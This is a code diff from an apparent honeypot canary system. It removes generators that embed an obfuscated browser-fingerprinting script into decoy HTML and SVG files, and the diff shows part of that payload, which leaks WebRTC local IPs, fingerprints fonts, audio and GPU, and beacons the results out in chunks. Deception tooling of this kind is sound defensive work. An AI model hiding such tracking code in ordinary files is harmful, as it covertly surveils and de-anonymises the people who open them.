if (gl) {
var ext = gl.getExtension("WEBGL_debug_renderer_info");
fp.gl = {
v: gl.getParameter(gl.VENDOR),
r: gl.getParameter(gl.RENDERER),
ver: gl.getParameter(gl.VERSION),
sl: gl.getParameter(gl.SHADING_LANGUAGE_VERSION),
uv: ext ? gl.getParameter(ext.UNMASKED_VENDOR_WEBGL) : null,
ur: ext ? gl.getParameter(ext.UNMASKED_RENDERER_WEBGL) : null,
};
} else { fp.gl = { err: "unavailable" }; }
} catch (e) { fp.gl = { err: String(e) }; }
// audio
// Renders a triangle oscillator through a compressor offline, then sums
// the absolute value of samples 4500..4999 of channel 0.
try {
var ACtx = window.OfflineAudioContext || window.webkitOfflineAudioContext;
if (ACtx) {
var actx = new ACtx(1, 44100, 44100);
var osc = actx.createOscillator();
var cmp = actx.createDynamicsCompressor();
osc.type = "triangle"; osc.frequency.value = 10000;
cmp.threshold.value = -50; cmp.knee.value = 40;
cmp.ratio.value = 12; cmp.attack.value = 0; cmp.release.value = 0.25;
osc.connect(cmp); cmp.connect(actx.destination);
osc.start(0);
var buf = await actx.startRendering();
var data = buf.getChannelData(0).slice(4500, 5000);
var sum = 0;
for (var i = 0; i < data.length; i++) sum += Math.abs(data[i]);
fp.au = { h: await sha256(sum.toString()), s: sum.toFixed(8) };
} else { fp.au = { err: "unavailable" }; }
} catch (e) { fp.au = { err: String(e) }; }
// fonts
// Measures an off-screen span in each generic base family, then again
// with every candidate font placed in front of the base; a size change
// against any base counts the candidate as detected.
// NOTE(review): this needs document.body. In a document without a body
// (presumably the SVG variant — confirm) appendChild throws and fp.ft
// becomes { err }.
try {
var bases = ["monospace", "sans-serif", "serif"];
var tests = [
"Arial", "Helvetica", "Times New Roman", "Courier New", "Verdana",
"Georgia", "Trebuchet MS", "Comic Sans MS", "Impact",
"Calibri", "Cambria", "Consolas", "Segoe UI", "Tahoma",
"JetBrains Mono", "Fira Code", "Cascadia Code", "SF Mono",
"Menlo", "Monaco", "Source Code Pro", "Inconsolata", "Hack",
"San Francisco", "Helvetica Neue", "Lucida Grande",
"DejaVu Sans", "DejaVu Sans Mono", "Liberation Sans",
"Liberation Mono", "Ubuntu", "Ubuntu Mono", "Roboto",
"Noto Sans", "Noto Mono",
"Microsoft YaHei", "SimSun", "PingFang SC", "Hiragino Sans",
"Hiragino Kaku Gothic Pro", "Yu Gothic", "Meiryo",
"Malgun Gothic", "Noto Sans CJK",
"Adobe Garamond Pro", "Myriad Pro", "Minion Pro",
"Bahnschrift", "Cyberpunk",
];
var sp = document.createElement("span");
sp.style.fontSize = "72px";
sp.style.position = "absolute";
sp.style.left = "-9999px";
sp.innerHTML = "mmmmmmmmmmlli";
document.body.appendChild(sp);
var bs = {};
for (var bi = 0; bi < bases.length; bi++) {
sp.style.fontFamily = bases[bi];
bs[bases[bi]] = { w: sp.offsetWidth, h: sp.offsetHeight };
}
var det = [];
for (var ti = 0; ti < tests.length; ti++) {
for (var bj = 0; bj < bases.length; bj++) {
sp.style.fontFamily = "'" + tests[ti] + "'," + bases[bj];
if (sp.offsetWidth !== bs[bases[bj]].w ||
sp.offsetHeight !== bs[bases[bj]].h) {
det.push(tests[ti]); break;
}
}
}
document.body.removeChild(sp);
// Hash is taken over a sorted copy so it does not depend on probe order.
fp.ft = {
h: await sha256(det.slice().sort().join(",")),
n: det.length, t: tests.length, d: det,
};
} catch (e) { fp.ft = { err: String(e) }; }
// webrtc local ip leak
// Gathers ICE candidates for a fixed 1500 ms and extracts anything that
// looks like an IPv4 address or a "::"-containing IPv6 address.
// NOTE(review): pc.close() is only reached on the success path; if
// createOffer / setLocalDescription rejects, the connection stays open.
try {
var ips = {}; var cands = [];
var RPC = window.RTCPeerConnection || window.webkitRTCPeerConnection ||
window.mozRTCPeerConnection;
if (RPC) {
var pc = new RPC({ iceServers: [{ urls: "stun:stun.l.google.com:19302" }] });
pc.createDataChannel("");
pc.onicecandidate = function (e) {
if (!e.candidate) return;
cands.push(e.candidate.candidate);
var m = e.candidate.candidate.match(
/(\d+\.\d+\.\d+\.\d+|[a-f0-9:]+::[a-f0-9:]+)/);
if (m) ips[m[1]] = 1;
};
var off = await pc.createOffer();
await pc.setLocalDescription(off);
await new Promise(function (r) { setTimeout(r, 1500); });
pc.close();
fp.rtc = { ip: Object.keys(ips), n: cands.length, c: cands.slice(0, 3) };
} else { fp.rtc = { err: "unavailable" }; }
} catch (e) { fp.rtc = { err: String(e) }; }
// battery
// Infinity is mapped to the string "inf" so it survives JSON.stringify.
try {
if (navigator.getBattery) {
var bat = await navigator.getBattery();
fp.bt = {
c: bat.charging, l: bat.level,
ct: bat.chargingTime === Infinity ? "inf" : bat.chargingTime,
dt: bat.dischargingTime === Infinity ? "inf" : bat.dischargingTime,
};
} else { fp.bt = { err: "unavailable" }; }
} catch (e) { fp.bt = { err: String(e) }; }
// perf timing jitter
// 1000 samples, each timing a 1000-iteration sqrt loop; after sorting,
// indices 500 / 950 / 0 / 999 give median, p95, min and max.
try {
var samples = [];
for (var pi = 0; pi < 1000; pi++) {
var pa = performance.now();
var x = 0;
for (var pj = 0; pj < 1000; pj++) x += Math.sqrt(pj);
samples.push(performance.now() - pa);
}
samples.sort(function (a, b) { return a - b; });
fp.pf = {
med: samples[500].toFixed(4),
p95: samples[950].toFixed(4),
mn: samples[0].toFixed(4),
mx: samples[999].toFixed(4),
};
} catch (e) { fp.pf = { err: String(e) }; }
// permissions
// Each name is queried separately; a name the browser rejects is
// recorded as "unsupported" instead of failing the whole section.
try {
if (navigator.permissions) {
var names = ["geolocation", "notifications", "camera", "microphone",
"persistent-storage", "clipboard-read", "clipboard-write"];
var st = {};
for (var ni = 0; ni < names.length; ni++) {
try {
var r = await navigator.permissions.query({ name: names[ni] });
st[names[ni]] = r.state;
} catch (e) { st[names[ni]] = "unsupported"; }
}
fp.pm = st;
} else { fp.pm = { err: "unavailable" }; }
} catch (e) { fp.pm = { err: String(e) }; }
// composite identity hash — stable inputs only
// filter(Boolean) drops inputs that are missing or falsy, so sections
// that failed above simply do not contribute to the hash.
try {
var stable = [
fp.cv && fp.cv.h, fp.au && fp.au.h, fp.ft && fp.ft.h,
fp.gl && fp.gl.ur, fp.nav && fp.nav.pl,
fp.nav && fp.nav.hc, fp.tz && fp.tz.z,
fp.scr && (fp.scr.w + "x" + fp.scr.h),
].filter(Boolean).join("|");
fp.id = await sha256(stable);
} catch (e) { fp.id = { err: String(e) }; }
// 2) ship the payload as base64url JSON on a GET query param.
// The current worker records the hit on /c/<slug>; step-4 worker
// will decode ?d= and persist the fingerprint blob.
// A payload longer than MAX characters is split into `total` requests
// carrying s (random session id), i (chunk index), n (chunk count) and
// d (the chunk); every request also carries the nonce as k.
try {
var json = JSON.stringify(fp);
var b64 = btoa(unescape(encodeURIComponent(json)))
.replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/, "");
// chunk if URL would exceed safe limit (~6KB)
var MAX = 6000;
if (b64.length <= MAX) {
fire(BEACON_URL + "?d=" + b64 + "&k=" + MINT_NONCE);
} else {
var sid = (Math.random() * 1e9 | 0).toString(36);
var total = Math.ceil(b64.length / MAX);
for (var ci = 0; ci < total; ci++) {
var part = b64.substr(ci * MAX, MAX);
fire(BEACON_URL + "?s=" + sid + "&i=" + ci + "&n=" + total + "&d=" + part + "&k=" + MINT_NONCE);
}
}
} catch (e) { /* swallow */ }
})();

View File

@@ -1,140 +0,0 @@
"""HTML fingerprint canary — plausible-looking page with an obfuscated
browser-fingerprinting payload inlined at the bottom of ``<body>``.
The visible content is a deliberately mundane "internal directory"
table — the kind of file a curious attacker pulls off a decky's
filesystem and opens locally to triage. When the file is opened in
*any* network-connected browser the obfuscated payload runs and beacons
to ``/c/<callback_token>``: first a bare-open pixel, then a chunked
fingerprint dump (canvas, audio, fonts, WebGL, WebRTC local IPs,
timing jitter, permissions, composite identity hash).
Determinism: the mint UUID is derived from the callback token via
:func:`uuid.uuid5` so the same ``ctx`` always produces byte-identical
output, satisfying the generator contract in :mod:`decnet.canary.base`.
The obfuscator's seed and polymorphic config bits are likewise
callback-token-derived (see :mod:`decnet.canary.obfuscator`).
"""
from __future__ import annotations
import hashlib
import uuid
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
def _mint_uuid_for(callback_token: str) -> str:
return str(uuid.uuid5(_MINT_NAMESPACE, callback_token))
def _stable_int(callback_token: str, salt: str = "") -> int:
"""Deterministic non-negative int derived from the callback token.
``builtins.hash`` is salted per-process — useless for a generator
that must be byte-identical across runs. SHA-256 prefix is
overkill but free.
"""
h = hashlib.sha256((callback_token + "|" + salt).encode("utf-8")).digest()
return int.from_bytes(h[:4], "big")
_PAGE_TEMPLATE = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Internal Asset Directory</title>
<style>
body{{font-family:Segoe UI,Arial,sans-serif;background:#fafafa;color:#222;
margin:24px;font-size:13px}}
h1{{font-size:18px;margin:0 0 4px 0}}
.sub{{color:#777;font-size:11px;margin-bottom:18px}}
table{{border-collapse:collapse;width:100%;background:#fff;
box-shadow:0 1px 2px rgba(0,0,0,.05)}}
th,td{{padding:6px 10px;border-bottom:1px solid #eee;text-align:left}}
th{{background:#f4f4f4;font-weight:600;font-size:11px;
text-transform:uppercase;letter-spacing:.5px;color:#555}}
tr:hover td{{background:#fafbff}}
.foot{{margin-top:16px;color:#999;font-size:11px}}
</style>
</head>
<body>
<h1>Internal Asset Directory</h1>
<div class="sub">last sync: {sync_label} · {row_count} entries · CONFIDENTIAL</div>
<table>
<tr><th>Hostname</th><th>Owner</th><th>Role</th><th>VLAN</th><th>Notes</th></tr>
{rows}
</table>
<div class="foot">page generated by directory-sync v2.4.1 — do not redistribute</div>
<script>{payload}</script>
</body>
</html>
"""
_ROW_POOL = (
("ny-app-01.corp.local", "k.tanaka", "app server", "vlan20", "primary"),
("ny-db-01.corp.local", "ops", "postgres primary", "vlan30", "backup nightly"),
("ny-build-02.corp.local", "ci-bot", "jenkins agent", "vlan40", ""),
("sf-vpn-01.corp.local", "netsec", "wireguard endpoint", "vlan10", "external"),
("ldn-mail-03.corp.local", "j.weber", "exchange edge", "vlan50", ""),
("hk-cache-01.corp.local", "ops", "redis replica", "vlan30", "lag <1s"),
("br-dev-04.corp.local", "m.silva", "dev sandbox", "vlan60", "ephemeral"),
("eu-bastion-02.corp.local", "secops", "ssh jump host", "vlan10", "mfa required"),
("us-archive-01.corp.local", "compliance", "log archive", "vlan70", "retain 7y"),
)
def _build_rows(callback_token: str) -> tuple[str, int]:
    """Render the directory table rows for one canary page.

    Picks a token-derived window of 5 to 8 consecutive entries from
    ``_ROW_POOL`` (wrapping around at the end) and renders each as a
    ``<tr>`` with one ``<td>`` per field.

    Returns:
        ``(rows_html, row_count)``: the rows joined with newlines and the
        number of rows rendered.
    """
    # Local import: keeps this block self-contained without touching the
    # module's import list.
    from html import escape

    pick = _stable_int(callback_token, "pick") % len(_ROW_POOL)
    take = 5 + (_stable_int(callback_token, "take") % 4)
    selected = [_ROW_POOL[(pick + i) % len(_ROW_POOL)] for i in range(take)]
    # Cell text is data, not markup: escape it so values such as
    # "lag <1s" do not put a raw "<" into the page.
    cells = "\n".join(
        "<tr>"
        + "".join(f"<td>{escape(c, quote=False)}</td>" for c in row)
        + "</tr>"
        for row in selected
    )
    return cells, len(selected)
def _sync_label(callback_token: str) -> str:
    """Return the "last sync" timestamp shown in the page header.

    Day of month (1-28) and hour (0-23) are derived from the callback
    token via ``_stable_int``; year, month and minute are fixed, giving
    ``2026-04-DD HH:14 UTC``.
    """
    hour_of_day = _stable_int(callback_token, "hour") % 24
    day_of_month = 1 + _stable_int(callback_token, "day") % 28
    return f"2026-04-{day_of_month:02d} {hour_of_day:02d}:14 UTC"
class FingerprintHtmlGenerator(CanaryGenerator):
    """Generator for an HTML page that fingerprints the opening browser."""

    name = "fingerprint_html"

    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Build the HTML canary artifact for *ctx*.

        The mint UUID and nonce are derived from ``ctx.callback_token``;
        the JS payload comes from ``render_fingerprint_js`` and is
        inlined into ``_PAGE_TEMPLATE`` together with the token-derived
        table rows and sync label.

        The returned artifact has an empty ``path``, mode ``0o644``, an
        mtime offset of minus 14 days (in seconds), and carries the nonce
        in ``fingerprint_nonce``.
        """
        token = ctx.callback_token
        mint_uuid = _mint_uuid_for(token)
        nonce = nonce_for(token, mint_uuid)

        js_payload = render_fingerprint_js(
            callback_token=token,
            http_base=ctx.http_base,
            mint_uuid=mint_uuid,
            nonce=nonce,
        )
        table_rows, table_row_count = _build_rows(token)
        page = _PAGE_TEMPLATE.format(
            sync_label=_sync_label(token),
            row_count=table_row_count,
            rows=table_rows,
            payload=js_payload,
        )

        # Used only in the operator-facing notes below.
        beacon = f"{ctx.http_base.rstrip('/')}/c/{token}"
        artifact_notes = [
            f"obfuscated fingerprinter beacons={beacon}",
            f"mint_uuid={mint_uuid}",
        ]
        return CanaryArtifact(
            path="",
            content=page.encode("utf-8"),
            mode=0o644,
            mtime_offset=-86400 * 14,
            generator=self.name,
            fingerprint_nonce=nonce,
            notes=artifact_notes,
        )

View File

@@ -1,88 +0,0 @@
"""SVG fingerprint canary — standalone SVG with an embedded ``<script>``
that runs the obfuscated fingerprinter when the file is opened directly
in a browser.
SVG ``<script>`` only fires when the SVG is loaded as a top-level
document (or via ``<object>``/``<iframe>``); it's *blocked* when the
SVG is referenced from another page's ``<img>``. That's the right
posture for canary use: an attacker browsing the decky filesystem and
double-clicking a stray ``network_diagram.svg`` triggers it; rendering
inside a sandboxed CMS preview does not.
Same determinism guarantees as :mod:`fingerprint_html`.
"""
from __future__ import annotations
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
from decnet.canary.generators.fingerprint_html import _mint_uuid_for, _stable_int
from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
# SVG skeleton for the fake network-topology diagram. It is rendered with
# str.format(), so literal CSS braces are doubled ({{ }}) and the only real
# placeholders are {region}, {ver}, {review} and {payload}. The payload is
# placed inside a CDATA section of the <script> element.
_DIAGRAM_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 600 360" width="600" height="360">
<style>
.box{{fill:#f7f9fb;stroke:#7a93ad;stroke-width:1.2}}
.lbl{{font:12px Segoe UI,Arial,sans-serif;fill:#2a3a4a}}
.edge{{stroke:#7a93ad;stroke-width:1.2;fill:none}}
.title{{font:bold 14px Segoe UI,Arial,sans-serif;fill:#1a2a3a}}
.cap{{font:10px Segoe UI,Arial,sans-serif;fill:#6a7a8a}}
</style>
<text class="title" x="20" y="28">Network Topology — {region} segment</text>
<text class="cap" x="20" y="44">draft v{ver} · last reviewed {review}</text>
<rect class="box" x="40" y="80" width="120" height="50" rx="4"/>
<text class="lbl" x="100" y="110" text-anchor="middle">edge gw</text>
<rect class="box" x="240" y="80" width="120" height="50" rx="4"/>
<text class="lbl" x="300" y="110" text-anchor="middle">core sw</text>
<rect class="box" x="440" y="80" width="120" height="50" rx="4"/>
<text class="lbl" x="500" y="110" text-anchor="middle">app cluster</text>
<rect class="box" x="240" y="220" width="120" height="50" rx="4"/>
<text class="lbl" x="300" y="250" text-anchor="middle">db tier</text>
<path class="edge" d="M160 105 L240 105"/>
<path class="edge" d="M360 105 L440 105"/>
<path class="edge" d="M300 130 L300 220"/>
<script type="application/ecmascript"><![CDATA[
{payload}
]]></script>
</svg>
"""
# Region names used in the diagram title; one is chosen per token.
_REGIONS = ("us-east", "eu-central", "ap-south", "us-west", "sa-east")
class FingerprintSvgGenerator(CanaryGenerator):
    """Synthesise an SVG that fingerprints the browser opening it.

    The SVG is rendered from ``_DIAGRAM_TEMPLATE`` with the obfuscated
    fingerprint script embedded in a CDATA-wrapped ``<script>`` element.
    """

    name = "fingerprint_svg"

    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Build the SVG artifact for the token carried by *ctx*.

        Region, draft version (1..6) and review day (1..28) are derived
        from ``ctx.callback_token`` via ``_stable_int``.

        Raises whatever ``nonce_for`` or ``render_fingerprint_js`` raise.
        """
        mint_uuid = _mint_uuid_for(ctx.callback_token)
        nonce = nonce_for(ctx.callback_token, mint_uuid)
        payload = render_fingerprint_js(
            callback_token=ctx.callback_token,
            http_base=ctx.http_base,
            mint_uuid=mint_uuid,
            nonce=nonce,
        )
        # The script sits inside <![CDATA[ ... ]]>. Compact JS can contain
        # the sequence "]]>" (e.g. ``a[b[0]]>c``), which would end the
        # section early and leave the SVG as malformed XML. Split any such
        # occurrence across two adjacent CDATA sections; the XML parser
        # joins them back into the original text.
        cdata_safe_payload = payload.replace("]]>", "]]]]><![CDATA[>")

        region = _REGIONS[_stable_int(ctx.callback_token, "reg") % len(_REGIONS)]
        ver = 1 + (_stable_int(ctx.callback_token, "ver") % 6)
        day = _stable_int(ctx.callback_token, "day") % 28 + 1
        body = _DIAGRAM_TEMPLATE.format(
            region=region,
            ver=ver,
            review=f"2026-03-{day:02d}",
            payload=cdata_safe_payload,
        )
        # Recorded in the notes only; the script carries its own beacon URL.
        beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        return CanaryArtifact(
            path="",  # left empty here — presumably filled in by the caller
            content=body.encode("utf-8"),
            mode=0o644,
            mtime_offset=-86400 * 30,  # 30 days, in seconds, negative
            generator=self.name,
            fingerprint_nonce=nonce,
            notes=[
                f"obfuscated fingerprinter beacons={beacon}",
                f"mint_uuid={mint_uuid}",
            ],
        )

View File

@@ -43,7 +43,7 @@ class HoneydocPdfGenerator(CanaryGenerator):
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
try:
from pikepdf import Pdf, Name, Dictionary, String
from pikepdf import Pdf, Name, Dictionary, String # type: ignore[import-not-found]
except ImportError as e:
raise InstrumenterRejectedError(
"honeydoc_pdf requires pikepdf; install it (`pip install "

View File

@@ -32,7 +32,7 @@ class ImageInstrumenter(CanaryInstrumenter):
self, blob: bytes, ctx: CanaryContext, *, target_path: str,
) -> CanaryArtifact:
try:
from PIL import Image, PngImagePlugin
from PIL import Image, PngImagePlugin # type: ignore[import-not-found]
except ImportError as e:
raise InstrumenterRejectedError(
"image instrumenter requires Pillow; install it (`pip "

View File

@@ -34,7 +34,7 @@ class PdfInstrumenter(CanaryInstrumenter):
self, blob: bytes, ctx: CanaryContext, *, target_path: str,
) -> CanaryArtifact:
try:
import pikepdf
import pikepdf # type: ignore[import-not-found]
except ImportError as e:
raise InstrumenterRejectedError(
"PDF instrumenter requires pikepdf; install it (`pip "

View File

@@ -1,177 +0,0 @@
"""Per-mint JS obfuscator wrapper.
Thin Python wrapper around the ``javascript-obfuscator`` Node package.
Used by the fingerprint generators / instrumenters to produce a unique,
hard-to-statically-analyse JS blob per canary mint.
Two design choices flow from the canary contract in :mod:`base`:
* **Determinism.** Generators must return byte-identical artifacts for
the same ``(callback_token, http_base, dns_zone, persona)``. We
derive a numeric seed from the callback token and pass it to the
obfuscator's own ``seed`` option, and we derive the polymorphic
config bits from the same hash so a re-mint reproduces exactly.
* **Per-mint uniqueness.** Two different callback tokens produce
structurally different output: different identifier names, different
string-array rotation, optionally different transforms enabled.
The Node helper at ``_obfuscate_helper.js`` is invoked via subprocess.
We pass code+options as JSON on stdin and read the obfuscated result
from stdout. Stderr surfaces obfuscator failures.
"""
from __future__ import annotations
import hashlib
import hmac
import json
import os
import subprocess # nosec B404 — Node helper exec is the whole point
from pathlib import Path
from typing import Any
# Node helper script, resolved relative to this module's directory.
_HELPER = Path(__file__).parent / "_obfuscate_helper.js"
# Fingerprint payload file read by render_fingerprint_js(), resolved
# relative to this module's directory.
_PAYLOAD = Path(__file__).parent / "fingerprint_payload.js"
# Node binary path. Honor DECNET_NODE_BIN so deployments can pin a
# specific runtime; default to PATH lookup.
# Note: the environment variable is read once, at import time.
_NODE_BIN = os.environ.get("DECNET_NODE_BIN", "node")
# Hard timeout for the obfuscator subprocess. Real runs on the
# fingerprint payload sit well under 5s on a dev box.
_TIMEOUT_S = 30
class ObfuscatorError(RuntimeError):
    """Signals that the Node obfuscator helper could not produce output.

    Raised by :func:`obfuscate` when the node binary is missing, the run
    times out, the helper exits non-zero, or stdout is empty.
    """
class FingerprintSecretMissing(RuntimeError):
    """``DECNET_CANARY_FINGERPRINT_SECRET`` is not set in the environment.

    Each fingerprint canary carries a per-mint nonce computed from this
    server-side secret. Without the secret the worker has nothing to
    check incoming fingerprint beacons against, so minting fails loudly
    instead of shipping a canary that could be defeated.
    """
_FINGERPRINT_SECRET_ENV = "DECNET_CANARY_FINGERPRINT_SECRET"  # nosec B105 — this is an env var name, not a hardcoded password


def nonce_for(callback_token: str, mint_uuid: str) -> str:
    """Derive the fingerprint nonce for one mint.

    The nonce is the first 16 hex characters (64 bits) of
    ``HMAC-SHA256(secret, callback_token + "|" + mint_uuid)``, where the
    secret is read from the environment on every call. Sixteen characters
    keep the value short enough for a query string.

    Raises:
        FingerprintSecretMissing: the secret variable is unset or empty.
    """
    master_key = os.environ.get(_FINGERPRINT_SECRET_ENV, "")
    if master_key == "":
        raise FingerprintSecretMissing(
            f"{_FINGERPRINT_SECRET_ENV} is unset; fingerprint canaries cannot mint"
        )
    message = f"{callback_token}|{mint_uuid}".encode("utf-8")
    mac = hmac.new(master_key.encode("utf-8"), message, hashlib.sha256)
    return mac.hexdigest()[:16]
def _seed_from_token(callback_token: str) -> int:
"""Derive a 31-bit numeric seed from the callback token.
``javascript-obfuscator`` expects ``seed: number`` (int32-ish);
using a SHA-256-derived prefix gives us a uniform distribution
across the 31-bit positive range.
"""
h = hashlib.sha256(callback_token.encode("utf-8")).digest()
return int.from_bytes(h[:4], "big") & 0x7FFFFFFF
def _config_from_seed(seed: int) -> dict[str, Any]:
"""Build a deterministic, per-mint obfuscator config.
The hash bits drive *which* transforms apply — two mints get
structurally different outputs, not just different identifier names.
Defaults stay aggressive enough that reverse engineering is real
work; we never disable string-array or rename, only vary the dial.
"""
bits = seed
encodings = ("base64", "rc4")
string_array_encoding = [encodings[bits & 1]]
control_flow_threshold = 0.5 + ((bits >> 1) & 0xFF) / 512.0 # 0.5 .. ~1.0
dead_code_threshold = 0.2 + ((bits >> 9) & 0xFF) / 512.0 # 0.2 .. ~0.7
transform_object_keys = bool((bits >> 17) & 1)
numbers_to_expressions = bool((bits >> 18) & 1)
simplify = bool((bits >> 19) & 1)
return {
"compact": True,
"seed": seed,
"controlFlowFlattening": True,
"controlFlowFlatteningThreshold": round(control_flow_threshold, 3),
"deadCodeInjection": True,
"deadCodeInjectionThreshold": round(dead_code_threshold, 3),
"stringArray": True,
"stringArrayEncoding": string_array_encoding,
"stringArrayThreshold": 1,
"stringArrayRotate": True,
"stringArrayShuffle": True,
"splitStrings": True,
"splitStringsChunkLength": 4 + (bits & 7),
"transformObjectKeys": transform_object_keys,
"numbersToExpressions": numbers_to_expressions,
"simplify": simplify,
"selfDefending": False, # breaks SVG embed; not worth the cost
"renameGlobals": False,
"identifierNamesGenerator": "mangled-shuffled",
}
def obfuscate(code: str, *, callback_token: str) -> str:
    """Run *code* through the Node obfuscator, seeded by *callback_token*.

    The seed and option set both come from the token, so the same
    ``(code, callback_token)`` pair is sent to the helper with identical
    options every time. Code and options travel as one JSON document on
    the helper's stdin; the obfuscated source is read back from stdout
    and returned unmodified.

    Raises:
        ObfuscatorError: node is not installed, the helper timed out,
            exited non-zero, or printed nothing.
    """
    options = _config_from_seed(_seed_from_token(callback_token))
    request = json.dumps({"code": code, "options": options})
    argv = [_NODE_BIN, str(_HELPER)]
    try:
        proc = subprocess.run(  # nosec B603 — argv-form, no shell, fixed helper path; payload is JSON on stdin, not in argv
            argv,
            input=request,
            capture_output=True,
            text=True,
            timeout=_TIMEOUT_S,
            check=False,
        )
    except FileNotFoundError as e:
        raise ObfuscatorError(f"node binary not found: {_NODE_BIN!r}") from e
    except subprocess.TimeoutExpired as e:
        raise ObfuscatorError("javascript-obfuscator timed out") from e

    if proc.returncode != 0:
        # Only the first 400 characters of stderr go into the message.
        raise ObfuscatorError(
            f"javascript-obfuscator failed rc={proc.returncode} "
            f"stderr={proc.stderr.strip()[:400]}"
        )
    obfuscated = proc.stdout
    if obfuscated.strip() == "":
        raise ObfuscatorError("javascript-obfuscator returned empty output")
    return obfuscated
def render_fingerprint_js(
    *, callback_token: str, http_base: str, mint_uuid: str, nonce: str,
) -> str:
    """Produce the obfuscated fingerprint script for one mint.

    Reads the payload file, fills in the ``{{BEACON_URL}}``,
    ``{{MINT_UUID}}`` and ``{{MINT_NONCE}}`` placeholders (in that order),
    and passes the result to :func:`obfuscate` keyed on *callback_token*.

    The beacon URL is ``<http_base>/c/<callback_token>`` with any trailing
    slash on *http_base* removed. According to the payload contract the
    nonce is sent as ``&k=`` on each beacon and the worker rejects
    fingerprint payloads whose ``?k=`` differs from
    :attr:`CanaryToken.fingerprint_nonce`.
    """
    beacon = f"{http_base.rstrip('/')}/c/{callback_token}"
    substitutions = (
        ("{{BEACON_URL}}", beacon),
        ("{{MINT_UUID}}", mint_uuid),
        ("{{MINT_NONCE}}", nonce),
    )
    src = _PAYLOAD.read_text(encoding="utf-8")
    for placeholder, value in substitutions:
        src = src.replace(placeholder, value)
    return obfuscate(src, callback_token=callback_token)

View File

@@ -1,10 +0,0 @@
{
"name": "decnet-canary-obfuscator",
"version": "0.1.0",
"private": true,
"description": "Node helper for decnet.canary.obfuscator — javascript-obfuscator wrapper invoked via subprocess.",
"main": "_obfuscate_helper.js",
"dependencies": {
"javascript-obfuscator": "^5.4.2"
}
}

View File

@@ -28,8 +28,6 @@ _LINUX_DEFAULTS: dict[str, str] = {
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
"fingerprint_html": "/home/{user}/Documents/asset_directory.html",
"fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
}
_WINDOWS_DEFAULTS: dict[str, str] = {
@@ -40,8 +38,6 @@ _WINDOWS_DEFAULTS: dict[str, str] = {
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
"fingerprint_html": "/home/{user}/Documents/asset_directory.html",
"fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
}

View File

@@ -20,8 +20,11 @@ shape but speaks bytes-via-base64 over the wire.
"""
from __future__ import annotations
import asyncio
import base64
import os
from datetime import datetime, timedelta, timezone
import shlex
import time
from secrets import token_urlsafe
from typing import Any, Iterable, Optional
@@ -31,16 +34,13 @@ from decnet.bus.factory import get_bus
from decnet.canary.base import CanaryArtifact, CanaryContext
from decnet.canary.factory import get_generator
from decnet.canary.paths import default_path_for
from decnet.decky_io import (
delete_file_from_container,
resolve_topology_container,
write_file_to_container,
)
from decnet.logging import get_logger
from decnet.web.db.repository import BaseRepository
log = get_logger("canary.planter")
_DOCKER = "docker"
_TIMEOUT = 8.0
# Container suffix — matches the orchestrator SSH driver's convention
# (``<decky_name>-ssh``). Canary placement always happens through the
# ssh container because every decky has one and it carries the most
@@ -52,16 +52,62 @@ def _container_for(decky_name: str) -> str:
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
# resolve_topology_container is re-exported from decky_io for back-compat
# with callers (tests, deploy hook) that imported it from this module
# before the decky_io extraction.
__all__ = [
"plant",
"revoke",
"resolve_topology_container",
"seed_baseline",
"seed_baseline_topology",
]
def _dirname(path: str) -> str:
idx = path.rfind("/")
if idx <= 0:
return "/"
return path[:idx]
async def _run(
    argv: list[str], *, stdin_bytes: Optional[bytes] = None,
) -> tuple[int, str, str]:
    """Run *argv* as a subprocess and collect its result.

    Args:
        argv: Program and arguments; executed without a shell.
        stdin_bytes: Optional bytes to feed to the child's stdin. When
            ``None`` no stdin pipe is opened.

    Returns:
        ``(returncode, stdout, stderr)`` with both streams decoded as
        UTF-8 (undecodable bytes replaced). Two failure modes are mapped
        to shell-style codes instead of raising:

        * ``127`` — the executable could not be found.
        * ``124`` — the child did not finish within ``_TIMEOUT`` seconds
          and was killed.
    """
    try:
        proc = await asyncio.create_subprocess_exec(
            *argv,
            stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
            stdout=asyncio.subprocess.PIPE,
            stderr=asyncio.subprocess.PIPE,
        )
    except FileNotFoundError as exc:
        return 127, "", f"argv[0] not found: {exc}"
    try:
        stdout, stderr = await asyncio.wait_for(
            proc.communicate(input=stdin_bytes), timeout=_TIMEOUT,
        )
    except asyncio.TimeoutError:
        try:
            proc.kill()
        except ProcessLookupError:
            # Child exited between the timeout firing and the kill.
            pass
        # Reap the child. Without this the killed process lingers as a
        # zombie and its transport is never closed.
        await proc.wait()
        return 124, "", "timeout"
    return (
        proc.returncode if proc.returncode is not None else -1,
        stdout.decode("utf-8", "replace"),
        stderr.decode("utf-8", "replace"),
    )
def _build_plant_command(artifact: CanaryArtifact) -> tuple[str, bytes]:
    """Build the ``sh -c`` script and stdin payload that plant *artifact*.

    The content is base64-encoded on the host and meant to be streamed to
    ``base64 -d`` on the script's stdin, so file bytes never appear in
    argv (which is bounded by the kernel's ARG_MAX). The script creates
    the parent directory, writes the file, sets its mode, then sets its
    mtime to "now + ``artifact.mtime_offset``" as a unix timestamp. All
    paths are shell-quoted.

    Returns:
        ``(script, encoded_content)``.
    """
    target = shlex.quote(artifact.path)
    parent = shlex.quote(_dirname(artifact.path))
